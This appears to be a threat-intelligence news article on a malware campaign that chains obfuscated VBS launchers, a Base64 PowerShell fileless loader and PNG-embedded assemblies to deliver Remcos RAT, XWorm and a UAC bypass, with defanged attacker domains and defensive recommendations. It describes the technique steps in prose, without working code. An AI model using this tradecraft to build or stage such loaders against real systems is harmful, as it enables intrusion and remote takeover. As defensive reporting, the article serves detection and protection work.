A sophisticated multi-stage malware campaign has surfaced, deploying obfuscated Visual Basic Script (VBS) files, PNG-embedded loaders, and remote access trojans (RATs) to target systems without leaving a trace on disk.
What began as a routine endpoint detection in early 2026 quickly revealed itself to be far more organized than a single opportunistic attack, exposing a reusable delivery framework capable of pushing different malware payloads across separate attack chains from one shared infrastructure.
The first sign of the campaign was a suspicious VBS file named Name_File.vbs, found in the UsersPublicDownloads directory of a compromised endpoint.
SentinelOne endpoint protection caught and quarantined the file before it could fully run. Even so, the encoded content inside the script warranted a closer look.
When decoded, it exposed a Base64-encoded PowerShell command with embedded external network references — a clear signal that the file was designed to pull additional components from a remote server.
LevelBlue analysts identified that this single endpoint alert was a window into a much larger operation.
The investigation, carried out by LevelBlue’s SpiderLabs Cyber Threat Intelligence team, uncovered an attacker-controlled domain hosting multiple obfuscated VBS files, each linked to a different malware payload — including XWorm variants and Remcos RAT stored as text files.
A separate infection chain tied to a fake PDF was also active on the same infrastructure, confirming the campaign’s deliberate, multi-vector design.
The attacker’s infrastructure centered on openly accessible directories within the domain news4me[.]xyz, including /coupon/, /protector/, and /invoice/.
Each directory served a distinct role — staging VBS launchers, hosting obfuscated payload files, or delivering entirely separate infection vectors.
This open-directory setup was not accidental; it let the attacker quickly update, rotate, or expand hosted payloads without modifying the core delivery logic, creating a flexible, scalable system capable of staying operational even after partial detection.
Inside the Infection Mechanism: VBS to In-Memory RAT Execution
The infection begins with a VBS file that acts purely as a launcher, carrying no active malicious code of its own.
.webp)
The script is buried beneath layers of Unicode obfuscation. Stripping those characters exposes the raw encoded script in a Base64-encoded PowerShell command that serves as the true engine of the attack.
.webp)
That PowerShell command functions as a fileless loader. It enforces TLS 1.2 and uses the Net.WebClient class to fetch a remote file from an Internet Archive URL.
.webp)
Instead of pulling a traditional executable, it downloads a PNG image — MSI_PRO_with_b64.png. The file looks ordinary, but hidden inside it — between custom BaseStart and BaseEnd markers.
This assembly, known as PhantomVAI, loads directly into memory via Reflection.Assembly::Load, running entirely in RAM and bypassing most file-based security controls.
Once running, PhantomVAI passes two URLs into its VAI method for follow-on execution. The first, news4me[.]xyz/protector/johnremcos.txt, contains an obfuscated string that decodes into a working instance of Remcos RAT, giving the attacker persistent remote access to the machine.
The second URL delivers uac.png, a PNG file carrying a UAC Bypass DLL in the same embedded format — designed to silently escalate privileges. Together, these payloads hand the attacker full control while leaving virtually no traditional file artifacts behind.
Organizations should restrict .vbs and .bat execution from user-writable directories such as UsersPublic and enforce constrained PowerShell policies with in-memory execution logging.
At the network level, blocking WebDAV-based connections and filtering .xyz top-level domains can limit access to the attacker infrastructure identified in this campaign.
Endpoint protection must be paired with deeper threat intelligence investigation — stopping one alert is not sufficient when the broader infrastructure remains active and ready to deploy from alternate vectors.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
